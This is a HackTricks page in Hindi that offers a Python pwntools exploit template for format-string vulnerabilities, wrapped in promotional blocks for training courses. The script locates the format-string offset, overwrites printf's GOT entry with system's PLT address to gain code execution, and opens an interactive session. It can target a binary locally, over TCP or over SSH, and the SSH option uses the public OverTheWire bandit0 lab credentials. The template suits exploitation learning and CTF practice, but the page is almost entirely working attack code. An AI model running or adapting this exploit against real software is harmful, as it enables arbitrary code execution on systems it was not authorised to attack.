# फॉर्मेट स्ट्रिंग्स टेम्पलेट {% hint style="success" %} AWS हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
हैकट्रिक्स का समर्थन करें * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! * 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम ग्रुप**](https://t.me/peass) ज्वाइन करें या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
{% endhint %} ```python from pwn import * from time import sleep ################### ### CONNECTION #### ################### # Define how you want to exploit the binary LOCAL = True REMOTETTCP = False REMOTESSH = False GDB = False # Configure vulnerable binary LOCAL_BIN = "./tyler" REMOTE_BIN = "./tyler" #For ssh # In order to exploit the format string you may need to append/prepend some string to the payload # configure them here PREFIX_PAYLOAD = b"" SUFFIX_PAYLOAD = b"" NNUM_ALREADY_WRITTEN_BYTES = 0 MAX_LENTGH = 999999 #Big num if not restricted print(" ====================== ") print("Selected options:") print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}") print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}") print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}") print(" ====================== ") def connect_binary(): global P, ELF_LOADED, ROP_LOADED if LOCAL: P = process(LOCAL_BIN) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTETTCP: P = remote('10.10.10.10',1338) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTESSH: ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) P = ssh_shell.process(REMOTE_BIN) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(elf)# Find ROP gadgets ####################################### ### Get format string configuration ### ####################################### def send_payload(payload): payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD log.info("payload = %s" % repr(payload)) if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") P.sendline(payload) sleep(0.5) return P.recv() def get_formatstring_config(): global P for offset in range(1,1000): connect_binary() P.clean() payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" recieved = send_payload(payload).strip() if b"41" in recieved: for padlen in range(0,4): if b"41414141" in recieved: connect_binary() payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" recieved = send_payload(payload).strip() print(recieved) if b"42424242" in recieved: log.info(f"Found offset ({offset}) and padlen ({padlen})") return offset, padlen else: connect_binary() payload = b" " + payload recieved = send_payload(payload).strip() # In order to exploit a format string you need to find a position where part of your payload # is being reflected. Then, you will be able to put in the position arbitrary addresses # and write arbitrary content in those addresses # Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string offset, padlen = get_formatstring_config() # In this template, the GOT of printf (the part of the GOT table that points to where the printf # function resides) is going to be modified by the address of the system inside the PLT (the # part of the code that will jump to the system function). # Therefore, next time the printf function is executed, system will be executed instead with the same # parameters passed to printf # In some scenarios you will need to loop1 more time to the vulnerability # In that cases you need to overwrite a pointer in the .fini_array for example # Uncomment the commented code below to gain 1 rexecution extra #P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address #INIT_LOOP_ADDR = 0x8048614 # Address to go back SYSTEM_PLT = ELF_LOADED.plt["system"] P_GOT = ELF_LOADED.got["printf"] #log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}") #log.info(f"fini.array address: {hex(P_FINI_ARRAY)}") log.info(f"System PLT address: {hex(SYSTEM_PLT)}") log.info(f"Printf GOT address: {hex(P_GOT)}") connect_binary() if GDB and not REMOTETTCP and not REMOTESSH: # attach gdb and continue # You can set breakpoints, for example "break *main" gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" sleep(5) format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) format_string.write(P_GOT, SYSTEM_PLT) format_string.execute_writes() # Now that printf function is executing system you just need to find a place where you can # control the parameters passed to printf to execute arbitrary code. P.interactive() ``` {% hint style="success" %} **AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ **GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
हैकट्रिक्स का समर्थन करें * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! * 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
{% endhint %}